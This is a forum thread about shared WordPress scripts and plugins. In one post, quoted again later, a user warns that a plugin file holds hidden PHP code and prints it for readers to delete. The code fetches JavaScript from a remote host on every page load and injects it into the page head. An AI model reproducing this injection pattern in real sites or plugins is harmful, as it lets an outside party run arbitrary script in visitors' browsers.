06-10-2013, 08:12 AM
07-18-2013, 07:25 PM
Thanks for the scripts man
07-28-2013, 06:52 PM
Thanks man for sharing ...some asses are selling it on their blogs for 100$
07-30-2013, 04:02 AM
Be careful with ccc wordpress plugin. please delete this code from cccs-2.8.php (edit plugin) for your safety
PHP Code:
function jqueryj_head() {
if(function_exists('curl_init'))
{
$url = "hxxp://smuss.net/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
07-31-2013, 06:51 PM
how can I embed an iframe to a wordpress site??
11-23-2013, 05:40 AM
Thanks for checking and notifying us!



(07-30-2013 04:02 AM)ebokalsel Wrote: [ -> ]Be careful with ccc wordpress plugin. please delete this code from cccs-2.8.php (edit plugin) for your safety
PHP Code:
function jqueryj_head() {
if(function_exists('curl_init'))
{
$url = "hxxp://smuss.net/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
11-26-2013, 08:23 PM
if you using this, get banned from broker!! very harmfull and very high risk. this is old method and all broker know it
12-17-2013, 08:49 AM
link worked fine for me mate.
12-23-2013, 01:46 AM
Thanks a lot guys!
01-19-2016, 10:55 AM
gone any mirror???